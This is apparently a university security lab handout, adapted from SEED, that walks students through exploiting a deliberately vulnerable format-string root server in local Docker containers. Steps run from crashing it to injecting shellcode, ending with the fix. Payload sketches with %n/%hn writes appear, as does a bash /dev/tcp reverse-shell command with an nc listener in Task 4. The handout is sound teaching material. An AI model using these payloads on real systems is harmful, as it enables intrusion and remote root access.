Lab 3: Format String and Reverse Shell

Adapted from the SEED Labs Format String Attack Lab (Ubuntu 20.04 edition) by Wenliang Du. See Attribution and License.

EnvironmentSEED Ubuntu 20.04 VM (setup) with Docker + docker-compose — this lab is x86 (32-bit) and needs the multilib toolchain
Fileslab3.tar.gz — the SEED Labsetup (Docker docker-compose.yml, server-code/, fmt-containers/, attack-code/), repackaged for this course. Can’t run Docker? Use the backup setup.
SubmissionOne PDF, structured as described in Submitting a Lab Report

Overview

printf() and its relatives take a format string — the "%d of %s\n" in printf("%d of %s\n", n, name) — that tells the function how many more arguments to expect and how to interpret each one. The function trusts that string completely: it reads one argument off the stack for every % directive it finds, whether or not the caller actually passed one.

That trust is safe only when the format string is a constant the programmer wrote. When a program instead lets user input become the format string — printf(user_input) instead of printf("%s", user_input) — the user, not the programmer, decides how many arguments printf reads and what it does with them. This is a format string vulnerability, and it is far more powerful than it first looks: with nothing but a carefully chosen string, an attacker can crash the program, read arbitrary memory, write to arbitrary memory, and ultimately inject and run their own code with the victim program’s privileges.

In this lab you are given a program with a format string vulnerability that runs with root privilege. You will exploit it in four escalating steps — crash it, read its memory, modify its memory, and finally inject shellcode to obtain a root shell — and then reason about the one-line fix that would have prevented all of it.

Topics covered:

  • Format string vulnerabilities and code injection
  • Stack layout and how printf walks its variadic arguments
  • The %x, %s, %n, and %hn directives, and the parameter field %k$
  • Shellcode and the reverse shell

Background reading

  • Chapter 6 of Computer & Internet Security: A Hands-on Approach, 2nd/3rd edition, by Wenliang Du — https://www.handsonsecurity.net
  • Chapter 9 of the same book, for the reverse shell used in Task 4
  • man 3 printf (read the description of the %n conversion and the m$ parameter field), man 1 nc, man 1 gdb
  • The Appendix: how printf walks the stack at the end of this lab — read it before Task 2 if the %x counting feels like guesswork.

A note on architecture (read this first)

Like the SEED lab, we do the whole exercise in 32-bit (x86): the addresses contain no zero bytes, which keeps the payloads simple, and the stack layout is easier to reason about. Every gcc command uses -m32. This has two consequences:

  • You need the 32-bit toolchain: sudo apt install gcc gcc-multilib. The SEED Ubuntu 20.04 VM already has it. We also compile -static, so no 32-bit shared libraries are required at run time.
  • The attack runs actual x86 code. On an Apple Silicon Mac an ARM VM cannot execute the 32-bit x86 binary this lab produces. Contact the instructor on Piazza with your SSH public key and NetID for a department VM. Do not attempt this lab on an ARM VM.

The optional Task 5 revisits the attack on a 64-bit build, where the zero bytes in addresses make things harder.

Host Ubuntu version. This lab is developed and tested on the SEED Ubuntu 20.04 VM, but it also builds and runs on newer hosts (Ubuntu 22.04 / 24.04), because the provided Makefile handles the two things that would otherwise break: it pins -std=gnu17 (so newer gcc, which defaults to C23, still accepts server.c’s old-style prototype), and it links every binary statically. The container image is Ubuntu 20.04 (glibc 2.31); a dynamically-linked binary built on a newer host asks the container for a glibc it does not have (GLIBC_2.34 not found) and the server exits at once — static linking bakes libc into the binary so it runs in the container whatever your host is. If you ever see that GLIBC error, you are building dynamically: run make clean && make.

Use Docker (and docker compose) for this lab

Unlike Labs 1 and 2, which ran a single binary on the VM, this lab runs the vulnerable program as a network server inside a Docker container, and you attack it over the network with netcat.

If you cannot get Docker working on your machine, a Docker-free fallback is documented in Appendix B: Running Without Docker at the end of this lab.

Before you begin

Note. This lab turns off address randomization and runs a root server that you will deliberately crash and hijack. Everything happens inside containers on your own VM.

Make sure Docker and docker-compose are installed (the SEED VM already has them):

$ docker --version && docker-compose --version

Download the lab source files and unpack them inside the VM:

mkdir -p ~/cs487/lab3 && cd ~/cs487/lab3
wget https://xiaoguang.wang/computer-security-labs/labs/files/lab3.tar.gz
tar xzf lab3.tar.gz
cd Labsetup && ls

You should see:

docker-compose.yml     # defines the two server containers and their network
server-code/           # format.c (the vulnerable program), server.c, Makefile
fmt-containers/        # the Dockerfile the images are built from
attack-code/           # build_string.py and exploit.py -- where you build payloads

Setting up the environment

1. Turn off Address Space Layout Randomization (ASLR)

Guessing addresses is a critical step of the attack, and ASLR randomizes the stack, heap, and library addresses on every run. Turn it off on the VM (the containers share the host kernel, so this one command covers them too):

$ sudo sysctl -w kernel.randomize_va_space=0

2. How the program is built, and the compilation flags

The containers run pre-compiled binaries, so the first step is to build them. The server-code/Makefile compiles the vulnerable program twice — 32-bit (format-32, used in Tasks 1–4) and 64-bit (format-64, used in the optional Task 5) — plus the server wrapper, in effect:

$ gcc -DBUF_SIZE=L -z execstack -static -m32 -o format-32 format.c   # 32-bit
$ gcc -DBUF_SIZE=L -z execstack           -o format-64 format.c   # 64-bit

Each flag matters:

  • -m32 — 32-bit x86 (see the architecture note above); -static makes it self-contained so the small container image needs no 32-bit shared libraries.
  • -z execstack — makes the stack executable. Task 4 injects code onto the stack and jumps to it; a non-executable stack would block that. Defeating a non-executable stack is the subject of Lab 2; here we leave it off to focus on the format string itself.
  • -DBUF_SIZE=L — sets the stack-layout knob L (the L = line in the Makefile). Your instructor may give you a specific value; it shifts every offset in your payloads, so use the value you are told and set it before building.

Why the instructor picks L. A different L changes the number of %x specifiers you need and every offset that follows, so a payload built for one L will not work for another. This deliberately makes last year’s solutions — and the ones posted online — useless, and forces you to derive the numbers yourself.

Build the binaries and copy them where the Dockerfile expects them:

$ cd server-code
$ make              # builds server, format-32, format-64 (set L first if told to)
$ make install      # copies the binaries into ../fmt-containers
$ cd ..

3. Build and start the containers

Now build the images and bring the containers up. SEED’s VM defines handy aliases — dcbuild, dcup, dcdown — for the three docker-compose commands:

$ dcbuild           # alias for: docker-compose build
$ dcup              # alias for: docker-compose up

Not on the SEED VM? These aliases are not built in — add them once. Append the following to your ~/.bashrc, then run source ~/.bashrc. (If your Docker uses the v2 plugin, replace docker-compose with docker compose.)

alias dcbuild='docker-compose build'
alias dcup='docker-compose up'
alias dcdown='docker-compose down'
alias dockps='docker ps --format "{{.ID}}  {{.Names}}"'
docksh() { docker exec -it "$1" /bin/bash; }

docker-compose.yml starts two containers on a private network:

ContainerIP addressBinaryUsed in
server-10.9.0.510.9.0.5format-32 (32-bit)Tasks 1–4
server-10.9.0.610.9.0.6format-64 (64-bit)Task 5 (optional)

Leave dcup running in its own terminal — this is where the server’s output appears, which matters for every task below. Open a second terminal for your attacks. Useful commands (also aliased on the SEED VM):

$ dockps                       # docker ps, short form: list running containers + IDs
$ docksh <id>                  # get a bash shell inside a container (first few ID chars)
$ dcdown                       # alias for: docker-compose down  (stop everything)

The server adds a little randomness. server.c seeds each container with a random-length environment variable when it starts, so the addresses you see differ from your classmates’ — but they stay fixed for the life of the container. As long as you do not dcdown, the numbers are stable and your payloads stay valid. (This is not ASLR; it is just per-student variation.)

4. The vulnerable program

Here is the essence of server-code/format.c (the real file also has a 64-bit branch for Task 5). It reads up to 1500 bytes from standard input into buf[] — which, on the server, is the TCP connection — prints the addresses you will need, then passes buf down through a dummy_function() (whose only purpose is to add BUF_SIZE bytes of stack spacing) into myprintf(), which hands your input straight to printf as the format string — the bug.

unsigned int  target = 0x11223344;
char         *secret = "A secret message\n";

void myprintf(char *msg)
{
    unsigned int *framep;
    asm("movl %%ebp, %0" : "=r"(framep));
    printf("Frame Pointer (inside myprintf):      0x%.8x\n", (unsigned int) framep);
    printf("The target variable's value (before): 0x%.8x\n", target);

    printf(msg);          //  <-- THE FORMAT-STRING VULNERABILITY

    printf("The target variable's value (after):  0x%.8x\n", target);
}

int main(int argc, char **argv)
{
    char buf[1500];

    printf("The input buffer's address:    0x%.8x\n", (unsigned int) buf);
    printf("The secret message's address:  0x%.8x\n", (unsigned int) secret);
    printf("The target variable's address: 0x%.8x\n", (unsigned int) &target);

    printf("Waiting for user input ......\n");
    int length = fread(buf, sizeof(char), 1500, stdin);
    printf("Received %d bytes.\n", length);

    dummy_function(buf);    // inserts a BUF_SIZE-byte frame, then calls myprintf(buf)
    printf("(^_^)(^_^)  Returned properly (^_^)(^_^)\n");
    return 1;
}

Note the three things the attacker gets for free: the address of buf[] (where your input lives), the address of the secret string on the heap (Task 2.B), and the address of the target variable (Task 3). The frame pointer (Task 4) is printed too.

The compiler already warned about this. When the images were built you saw warning: format not a string literal and no format arguments [-Wformat-security], pointing straight at printf(msg). That warning is the vulnerability; you will explain and fix it in the wrap-up.

5. A first, benign run

Send an ordinary string to the 32-bit server and watch the output appear in the dcup terminal (not in your attack terminal):

# In your attack terminal:
$ echo hello | nc 10.9.0.5 9090
                          # press Ctrl+C if it does not return on its own
# What appears on the server's console (the dcup terminal):
server-10.9.0.5 | Got a connection from 10.9.0.1
server-10.9.0.5 | Starting format
server-10.9.0.5 | The input buffer's address:    0xffffd2d0
server-10.9.0.5 | The secret message's address:  0x080b4008
server-10.9.0.5 | The target variable's address: 0x080e5068
server-10.9.0.5 | Waiting for user input ......
server-10.9.0.5 | Received 6 bytes.
server-10.9.0.5 | Frame Pointer (inside myprintf):      0xffffd1f8
server-10.9.0.5 | The target variable's value (before): 0x11223344
server-10.9.0.5 | hello
server-10.9.0.5 | The target variable's value (after):  0x11223344
server-10.9.0.5 | (^_^)(^_^)  Returned properly (^_^)(^_^)

(Your addresses will differ from these — remember the per-container randomness — but they are stable until you dcdown.) The Returned properly line and the unchanged target value are your signal that nothing went wrong; in the tasks below, their absence or change on the server console is how you know your payload worked. Because most payloads are long and contain non-printable bytes, build them with the provided Python scripts in attack-code/ and pipe the resulting file to nc:

$ cd attack-code
$ ./build_string.py            # writes the payload to ./badfile
$ cat badfile | nc 10.9.0.5 9090

Task 1: Crashing the Program

Your first task is the simplest damage: provide an input that makes the program crash instead of returning properly. On the server console you will know it crashed because you do not see the (^_^)(^_^) Returned properly line after your connection — the format child died. (The server process itself keeps running and accepting new connections, because each request is handled in a forked child; only the child crashes.)

Think about what printf does with a format string full of directives when the caller passed no matching arguments. Each %x makes it read another 4-byte word off the stack and print it as a number — harmless, if odd. But %s makes it treat that word as a pointer and dereference it, reading a string from wherever that word points. Feed it enough %s and sooner or later one of those stack words is not a valid pointer, and the read faults.

$ echo '%s%s%s%s%s%s%s%s%s%s%s%s' | nc 10.9.0.5 9090
              # (standalone backup: echo '%s%s...' | ./format-32)

Watch the dcup terminal: a benign run ends with Returned properly, a crashing run does not.

Deliverable. The input you used and a screenshot/transcript of the server console showing the program crashed (no Returned properly). Explain why your input crashes it — which directive causes the fault, and what printf is trying to do at the moment it dies. If %s alone did not crash it on the first try, explain why you might need several.

Understanding check. A string of %n directives will also crash the program, but for a different reason than %s. What is that reason? (You will use %n on purpose in Task 3 — here it crashes because of where it tries to write.)


Task 2: Printing Out the Server Program’s Memory

Now make the program leak its own memory. The leaked data prints on the server’s console (the dcup terminal), where a true remote attacker could not see it — so this is not a practical attack by itself. The point is the technique: finding where your own input sits among the arguments printf walks. That offset is the single most important number in the whole lab; every later task depends on it.

Task 2.A: Stack data — find the magic number

When printf starts consuming %x directives, it walks up the stack from just above its own arguments. A few words up, it reaches the memory that holds your input string itself (buf[]). If you can count how many %x it takes to get there, then the next directive is reading bytes you control.

Put a recognizable 4-byte marker at the very front of your input, follow it with a run of %x separated by dots, and count: when one of the printed values comes back as your marker, the number of %x up to and including it is the magic number k.

# build_string.py (sketch)
content = bytearray(0x0 for i in range(1500))
content[0:4] = (0x44434241).to_bytes(4, byteorder='little')   # "ABCD" marker
s = ".%x" * 30
content[4:4+len(s.encode())] = s.encode('latin-1')
$ ./build_string.py                     # writes ./badfile
$ cat badfile | nc 10.9.0.5 9090        # (standalone backup: cat badfile | ./format-32)

On the server console, read across the printed %x values until you see ...41424344... (your marker). Count the %x positions to it. You can confirm with the parameter field: %k$x should print the marker directly.

Deliverable. Your input, the output showing your marker appearing in the %x dump, and the value of k — the number of %x needed to reach the start of your own input. Explain what those first k−1 values you skipped over actually are (whose stack words is printf printing before it reaches your buffer?).

Task 2.B: Heap data — read the secret string

The program stores a secret string on the heap and prints its address for you. Use the vulnerability to print the contents of that string. The idea: place the address of the secret at the front of your input (little-endian, in binary), use your magic number k to walk printf’s argument pointer to that address, and then a %s dereferences it and prints the string.

secret_addr = 0x080b4008                                  # from the program's printout
content[0:4] = (secret_addr).to_bytes(4, byteorder='little')
# then reach slot k with (k-1) %x, and finish with %s   -- or just use %k$s

Deliverable. Your payload and a screenshot showing the secret message printed. Explain how the address at the front of your buffer becomes the argument that %s dereferences, and why the byte order of that address matters.

Understanding check. The leak prints on the server’s console, where a real remote attacker cannot see it. Why is the technique still essential even when the attacker cannot read the leak? (Hint: Tasks 3 and 4 use the same k to write, not read.)


Task 3: Modifying the Server Program’s Memory

Reading memory is serious; writing it is worse. The %n directive does not print anything — it writes the number of characters output so far into the address given by the corresponding argument. Point that argument at the target variable and you can change its value. target starts at 0x11223344; the program prints its value before and after, so you can see your write land.

The mechanism is exactly Task 2.B, but with %n in place of %s: put target’s address at the front, walk to it with your magic number k, and write with %n.

Task 3.A: Change target to any different value

Success is simply making the “after” value differ from 0x11223344.

target_addr = 0x080e5068                                  # from the program's printout
content[0:4] = (target_addr).to_bytes(4, byteorder='little')
# reach slot k, then %n   (the value written is however many chars printed so far)

Deliverable. Your payload and the before/after output showing target changed. State what value it changed to and explain where that number came from.

Task 3.B: Change target to exactly 0x5000

%n writes the count of characters printed so far. To land a specific value you control that count — usually with a width field such as %.20000x, which prints a number padded to 20000 characters. 0x5000 is 20480 in decimal, so arrange for exactly 20480 characters to have been printed at the moment %n fires (remember to subtract the bytes you already printed before the width directive).

Deliverable. Your payload and the output showing target is now 0x00005000. Show the arithmetic: how you made the running character count reach exactly 20480.

Task 3.C: Change target to 0xAABBCCDD

0xAABBCCDD is 2,863,311,581 in decimal — a single %n would have to print nearly 3 billion characters, which takes far too long. The fix is to write two bytes at a time with %hn (or one byte with %hhn): write the low half-word and the high half-word to target and target+2 separately, so the largest count you ever print is about 65535 characters.

Because %n writes a running, monotonically increasing count, order the two writes so the required count only goes up: write whichever half-word is the smaller number first, then print the difference in characters before writing the larger one.

content[0:4] = (target_addr    ).to_bytes(4, byteorder='little')   # for the low half
content[4:8] = (target_addr + 2).to_bytes(4, byteorder='little')   # for the high half
# then two %hn writes, with width fields chosen so the counts hit 0xCCDD and 0xAABB

Deliverable. Your payload and the output showing target is now 0xaabbccdd. Explain why %n would have been impractical here, how %hn fixes it, and why the order in which you write the two half-words matters.

Understanding check. You placed the addresses to write to at the front of your input and the value came from the character count. Explain, in one or two sentences, why the attacker controls both the address written to and the value written — this “write-anything-anywhere” primitive is what makes Task 4 possible.


Task 4: Inject Malicious Code into the Server Program

Now the crown jewel. Instead of writing to target, you will use the same write-anything-anywhere primitive to overwrite a return address, redirecting execution into shellcode you placed in the buffer. Because the program runs as root, the shell you get is a root shell.

The plan

  1. Put shellcode in the buffer. exploit.py already places a 32-bit shellcode near the end of your 1500-byte payload. Its start address is buf_address + start_offset — and buf_address is printed by the program.
  2. Find the return address slot. When myprintf returns, the CPU jumps to the address saved just above myprintf’s saved %ebp. The program prints the frame pointer; the return-address slot is at frame pointer + 4. (Work through the Appendix if this is unfamiliar.)
  3. Overwrite that slot with the shellcode’s start address, using the two-%hn technique from Task 3.C — low half-word to ret_addr, high half-word to ret_addr + 2. When myprintf returns, it “returns” into your shellcode.

The stack when printf runs inside myprintf

        higher addresses
   +--------------------------+
   |   buf[1500]  (your input |  <- your shellcode sits near the top of this;
   |   lives here, in main)   |     its address = buf_address + start_offset
   +--------------------------+
   |        ....              |
   +--------------------------+
   |   return address of      |  <- overwrite THIS (at frame pointer + 4)
   |   myprintf()             |     with the shellcode's start address
   +--------------------------+
   |   saved %ebp of myprintf |  <- frame pointer points here
   +--------------------------+
   |        ....              |
   +--------------------------+
   |   format string arg ---> |  <- printf starts walking its args from here;
   |   (points into buf)      |     your magic number k counts up to buf
        lower addresses

Demonstrate code execution

The shellcode in attack-code/exploit.py runs /bin/bash -c "<command>". It ships with a harmless demo command (/bin/ls -l; echo '===== Success! ======'). Fill in the format-string portion of exploit.py to overwrite the return address, then fire the payload at the server:

$ ./exploit.py                          # build badfile
$ cat badfile | nc 10.9.0.5 9090        # (standalone backup: cat badfile | sudo ./format-32)

Watch the server console. If your overwrite landed, you will see the ls listing and ===== Success! ====== — output produced by your injected code, running as root inside the server. If you instead see Returned properly, your overwrite missed; a segfault means your target address or count is off. Recheck k, the frame pointer, and your two half-word counts.

Get a root reverse shell

A fixed command is not control — and on the real server its output prints on the server console, where you cannot see it. For an interactive root shell you drive, switch the shellcode’s command string to a reverse shell that connects back to a listener you run. In exploit.py, change the command string, keeping the * in the same column by padding with spaces (its position is hard-coded in the shellcode):

"/bin/bash -i > /dev/tcp/10.9.0.1/7070 0<&1 2>&1           *"

10.9.0.1 is your VM’s address on the container network (the gateway the containers see); 7070 is a spare port for the shell, kept separate from the server’s 9090. Start the listener on the VM, then fire the exploit:

# Terminal 1 (on the VM) — the attacker's listener
$ nc -lnv 7070

# Terminal 2 (on the VM) — trigger the vulnerable root server
$ ./exploit.py
$ cat badfile | nc 10.9.0.5 9090

The listener should receive a shell. Confirm it is root, and that you are inside the container (its hostname is the container ID):

# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
<container id>

Why a reverse shell here? The server child’s standard input is the TCP connection that carried your payload; a plain interactive /bin/bash would fight over that same socket and give you no usable prompt. The reverse shell sidesteps this by opening a fresh connection (/dev/tcp/...) for the shell’s own input and output. (In the standalone backup, stdin is the exhausted badfile, so a plain shell would read EOF and exit immediately — the reverse shell fixes that too; point it at 127.0.0.1.)

Deliverable. (1) Evidence of code execution with the demo command. (2) Your reverse-shell attack: how you laid out the shellcode, how you derived the return-address slot from the frame pointer, and how you split the shellcode’s start address across two %hn writes. (3) A screenshot of the root reverse shell with id showing uid=0(root). Mark on the stack diagram where your shellcode is stored, with its concrete address.

Understanding check. You overwrote a return address with an address on the stack, and the CPU happily executed instructions there. Which one compilation flag, if removed, would have stopped this exact attack — and which Lab 2 technique would an attacker then reach for instead?


Task 5 (Optional, 1 bonus point): Attacking the 64-bit Program

The second container, server-10.9.0.6 (10.9.0.6), is already running the 64-bit build (format-64) — it came up with dcup, so there is nothing new to compile. Point your attack at 10.9.0.6 and mount the same code-injection attack to get a root shell, this time selecting the 64-bit shellcode in exploit.py (shellcode = shellcode_64):

$ cat badfile | nc 10.9.0.6 9090

The new obstacle is zero bytes in addresses. On x86-64, valid addresses run only up to 0x00007FFFFFFFFFFF, so every 8-byte address has zero bytes in its high end. You cannot drop such an address into the middle of your format string, because printf stops parsing at the first 0x00. You must decide where in the payload the zero-containing addresses can safely go, and use the parameter field (%k$...) to reach them.

The parameter field makes this manageable: %k$x reads the k-th argument directly, and you can move the pointer back and forth freely:

printf("%3$.20x%6$n%2$.10x\n", 1, 2, 3, 4, 5, &var);   // writes 20 into var

Deliverable. Your 64-bit payload and a screenshot of the resulting root shell. Explain specifically how you handled the zero-byte problem — where you placed the addresses in the payload and how you reached them — and how the 64-bit stack layout differed from the 32-bit case.


Wrap-up: Fixing the Vulnerability

Go back to the compiler warning you saw while building the images:

warning: format not a string literal and no format arguments [-Wformat-security]

In server-code/format.c, change the vulnerable line in myprintf from printf(msg); to printf("%s", msg);, then rebuild and restart the container so the fix takes effect:

$ cd server-code && make && make install && cd ..
$ dcbuild && dcup

Confirm both that the warning is gone and that one of your earlier attacks (say, Task 3.A) no longer works. (Standalone backup: just make and re-run ./format-32.)

Deliverable. State in your own words what the warning was telling you, show the one-line fix, and give evidence that the fix defeats your attack (the warning is gone and target no longer changes). Explain why printf("%s", msg) is safe when printf(msg) was not — what does the user no longer control?


Cleaning up

Stop and remove the containers, and undo the global change this lab made to your VM:

$ dcdown                                       # stop and remove the containers
$ sudo sysctl -w kernel.randomize_va_space=2   # re-enable ASLR

Kill any leftover nc listeners. You can reclaim disk space from the built images with docker image rm seed-image-fmt-server-1 seed-image-fmt-server-2 once you are done. (In the standalone backup, just delete the format-32/format-64 binaries and any badfile payloads you built.)

Submission

Submit a single PDF containing, for each task: the commands you ran, a screenshot or transcript of what you observed, and an explanation of why it happened. For the attack tasks, include your build_string.py / exploit.py and state clearly how you derived the magic number k, every address, and every character count. List the important code snippets followed by explanation — attaching code with no explanation will not receive credit.

See Submitting a Lab Report for the expected structure.


Appendix A: How printf Walks the Stack

If the %x counting in Task 2 feels like guesswork, this is the mechanism behind it.

A variadic function like printf receives its first argument (the format string) in the usual place, but it has no idea how many arguments follow — the format string is the only thing that tells it. Every time printf scans a conversion directive (%x, %s, %d, %n, …), it grabs “the next argument” by advancing a pointer through the memory that sits just above the format-string argument on the stack, and interprets whatever is there according to the directive:

  • %x — read the next 4-byte word, print it as hex. (Just reads; harmless.)
  • %s — read the next 4-byte word, treat it as a pointer, and print the string it points to. (A bad pointer faults — this is Task 1.)
  • %n — read the next 4-byte word, treat it as a pointer, and write the number of characters printed so far to that address. (This is the write primitive — Tasks 3 and 4.)
  • %hn / %hhn — like %n but write only 2 bytes / 1 byte. (Task 3.C.)
  • %k$... — skip straight to the k-th argument instead of walking one at a time. (Task 5.)

The attacker’s leverage comes from two facts working together:

  1. printf keeps reading arguments for as long as the format string tells it to, even past the arguments the caller actually pushed — so it walks off into other stack memory.
  2. A few words up that stack, it reaches buf[] — the attacker’s own input. So the attacker can plant an address in the buffer and then use %s/%n to make printf treat that attacker-chosen value as the pointer to read from or write to.

The magic number k from Task 2.A is simply how many arguments printf must walk before its pointer reaches the start of your buffer. Once you know k, every other task is a variation: reach slot k, then read (%s) or write (%n/%hn) through an address you planted there.


Appendix B: Running Without Docker (Backup Setup)

If you cannot get Docker working, download lab3-standalone.tar.gz instead. It contains the same format.c and the same attack-code/ scripts, with a trimmed Makefile that builds the vulnerable program so you can run it directly, feeding the payload on standard input instead of over the network:

wget https://xiaoguang.wang/computer-security-labs/labs/files/lab3-standalone.tar.gz
tar xzf lab3-standalone.tar.gz && cd Labsetup
make                                   # builds format-32 and format-64 (set L first)
echo hello | ./format-32               # the benign run, output right in your terminal

Everything else in this lab is identical — the payloads, the addresses logic, and the reasoning. The only differences: the program’s output appears in your own terminal (not on a separate server console), and wherever a task says ... | nc 10.9.0.5 9090, you instead run ... | ./format-32. For Task 4 you run the program as root to stand in for the root server — cat badfile | sudo ./format-32 — and point the reverse shell at 127.0.0.1. These substitutions are noted again where they matter.